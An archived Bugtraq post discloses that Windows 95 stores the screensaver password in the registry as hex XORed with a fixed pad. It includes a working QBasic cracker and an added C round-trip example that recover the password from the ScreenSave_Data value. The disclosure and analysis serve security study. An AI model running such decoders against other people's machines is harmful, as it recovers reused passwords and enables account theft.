I got the idea to explore a bit on the w95ss password in the registry
after seeing the bruteforce cracker (using tables of bytes).
(Why is this important to bugtraq? Loads of people use 1 password for
everything.)

It's kinda simple. First hex-decode the bytes (like in WSFTP), then XOR
them with a pad.

A basic prog follows (I was too lazy to get C off the CD).

-cp

Feel free to recode it in C and post to the list.

Attachment: 95sscrk.bas

DECLARE FUNCTION DecryptByte! (bytes!, ya!)
DECLARE FUNCTION HexVal! (coder$)
DIM SHARED byte(16) AS INTEGER
CLS
PRINT "Crazydog's w95 screensaver cracker, basic version"
INPUT "Input char part of ScreenSave_Data(from registry):", code$
z = LEN(code$): IF z MOD 2 <> 0 THEN PRINT "Must be even # of chars!": END
ON ERROR GOTO 40
' Walk the input two hex digits (one byte) at a time.
FOR y = 1 TO z STEP 2
  balon = balon + 1   ' 1-based position of this byte, selects the pad entry
  nibbleone$ = MID$(code$, y, 1): nibbletwo$ = MID$(code$, y + 1, 1)
  mega = (HexVal(nibbleone$) * 16) + HexVal(nibbletwo$)
  IF HexVal(nibbletwo$) < 0 THEN mega = -255 ' one if only.
  IF mega < 0 THEN PRINT "That didn't make any sense.": END
  ' Index by byte position (balon), not string offset (y), so byte() is not overrun.
  byte(balon) = DecryptByte(mega, balon): wilma$ = wilma$ + CHR$(byte(balon))
NEXT y
PRINT "The code is: "; wilma$; " (case insensitive)"
END
40 PRINT "[unknown]": END

' XOR one decoded byte with the pad entry for its position (1..16).
FUNCTION DecryptByte (bytes, ya)
  DIM xorpattern(31) AS INTEGER
  xorpattern(1) = &H48: xorpattern(2) = &HEE: xorpattern(3) = &H76
  xorpattern(4) = &H1D: xorpattern(5) = &H67: xorpattern(6) = &H69
  xorpattern(7) = &HA1: xorpattern(8) = &H1B: xorpattern(9) = &H7A
  xorpattern(10) = &H8C: xorpattern(11) = &H47: xorpattern(12) = &HF8
  xorpattern(13) = &H54: xorpattern(14) = &H95: xorpattern(15) = &H97
  xorpattern(16) = &H5F
  DecryptByte = bytes XOR xorpattern(ya)
END FUNCTION

' Value of one hex digit, or a negative number if it is not a hex digit.
FUNCTION HexVal (coder$)
  coder$ = UCASE$(coder$)
  SELECT CASE coder$
    CASE "0"
      whee = 0
    CASE "1"
      whee = 1
    CASE "2"
      whee = 2
    CASE "3"
      whee = 3
    CASE "4"
      whee = 4
    CASE "5"
      whee = 5
    CASE "6"
      whee = 6
    CASE "7"
      whee = 7
    CASE "8"
      whee = 8
    CASE "9"
      whee = 9
    CASE "A"
      whee = 10
    CASE "B"
      whee = 11
    CASE "C"
      whee = 12
    CASE "D"
      whee = 13
    CASE "E"
      whee = 14
    CASE "F"
      whee = 15
    CASE ELSE
      whee = -21
  END SELECT
  HexVal = whee
END FUNCTION
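Added example, not part of the original post or its attachment: a C round trip through the hex-plus-XOR encoding described above, showing that the stored value is reversible with nothing but the fixed pad. The pad bytes are the ones in the BASIC listing; the names ss_decode and ss_encode and the sample value "AB" are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Pad bytes copied from xorpattern(1..16) in the BASIC listing above. */
static const unsigned char PAD[16] = {
    0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B,
    0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F
};

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = toupper(c);
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a hex ScreenSave_Data string into out (NUL-terminated).
   Returns the plaintext length, or -1 for odd length, a non-hex
   character, or more bytes than the 16-byte pad covers. */
int ss_decode(const char *hex, char *out, size_t outsz) {
    size_t n = strlen(hex);
    if (n % 2 != 0 || n / 2 > sizeof PAD || n / 2 + 1 > outsz) return -1;
    for (size_t i = 0; i < n / 2; i++) {
        int hi = hexval((unsigned char)hex[2 * i]);
        int lo = hexval((unsigned char)hex[2 * i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[i] = (char)(((hi << 4) | lo) ^ PAD[i]);
    }
    out[n / 2] = '\0';
    return (int)(n / 2);
}

/* Inverse direction: XOR is its own inverse, so the same pad encodes. */
int ss_encode(const char *plain, char *hex, size_t hexsz) {
    size_t n = strlen(plain);
    if (n > sizeof PAD || 2 * n + 1 > hexsz) return -1;
    for (size_t i = 0; i < n; i++)
        sprintf(hex + 2 * i, "%02X", (unsigned)((unsigned char)plain[i] ^ PAD[i]));
    hex[2 * n] = '\0';
    return (int)(2 * n);
}

int main(void) {
    char hex[33], plain[17];
    ss_encode("AB", hex, sizeof hex);      /* constructed sample value */
    ss_decode(hex, plain, sizeof plain);
    printf("%s -> %s\n", hex, plain);
    return 0;
}
```

Because the pad is constant and indexed only by position, the same password always yields the same stored string, and the string's length gives away the password's length.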
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:54:51 PDT